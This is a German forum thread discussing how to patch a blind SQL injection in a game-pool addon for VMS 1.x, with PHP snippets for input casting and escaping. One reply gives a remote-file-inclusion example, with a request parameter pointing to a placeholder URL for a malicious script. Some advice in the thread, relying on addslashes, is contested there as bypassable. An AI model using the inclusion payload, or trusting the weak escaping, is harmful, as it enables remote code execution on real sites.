BlindSQL-Injection Game-Pool Addon Skandal für VMS 1.x

Zitat:

---

Zitat von j.knopf

suche:
if (!isset($_POST['buy'])) $_POST['buy']= "";

und füge darunter das hier ein:

$_POST['id']=abs(intval($_POST['id']));

---

Was genau soll das bringen?

Das:

PHP-Code:

---

if (!isset($_POST['buy']))    $_POST['buy']= ""; 


---

stellt nur fest ob "buy" im _POST-Array vorhanden ist, ist es nicht vorhanden wird es ja noch vernünftig deklariert, ist es aber vorhanden, wird es nicht mal auf Inhalt geprüft.

Vernünftiger wäre hier sowas (wenn "buy" ein string ist):

$buy = (!isset($_POST['buy']) ? '' : addslashes($_POST['buy']));

Wobei das ganze natürlich auch über andere Funktionen escapt werden kann/darf ;)

Achso.das ist auch kein SQL, sondern ein PHP-Injection ;-)

PHP-Code:

---

$_POST['id']=abs(intval($_POST['id'])); 


---

stellt sicher das $_POST['id'] eine positive Ganzzahl ist.

Zitat:

---

Zitat von breaker

Was genau soll das bringen?

Das:

PHP-Code:

---

if (!isset($_POST['buy']))    $_POST['buy']= ""; 


---

stellt nur fest ob "buy" im _POST-Array vorhanden ist, ist es nicht vorhanden wird es ja noch vernünftig deklariert, ist es aber vorhanden, wird es nicht mal auf Inhalt geprüft.

Vernünftiger wäre hier sowas (wenn "buy" ein string ist):

$buy = (!isset($_POST['buy']) ? '' : addslashes($_POST['buy']));

Wobei das ganze natürlich auch über andere Funktionen escapt werden kann/darf ;)

Achso.das ist auch kein SQL, sondern ein PHP-Injection ;-)

---

addslashes Ist nicht sicher lässt sich sehr einfach aus hebeln..
Wenn du weißt das da nur eine Ganzzahl kommen darf, dann sollte man das auch darauf Prüfen.
Und wenn du die ID so wie sie in die $var gespeichert ist an deine DB via aufruf übergibst ist es eine SQL Injektion :p

PHP wäre wenn du Include($_POST["pagename"].".php"); machen würdest :p
Denn pagename= http://meineurl.tls/bösesscript führt das dann aus.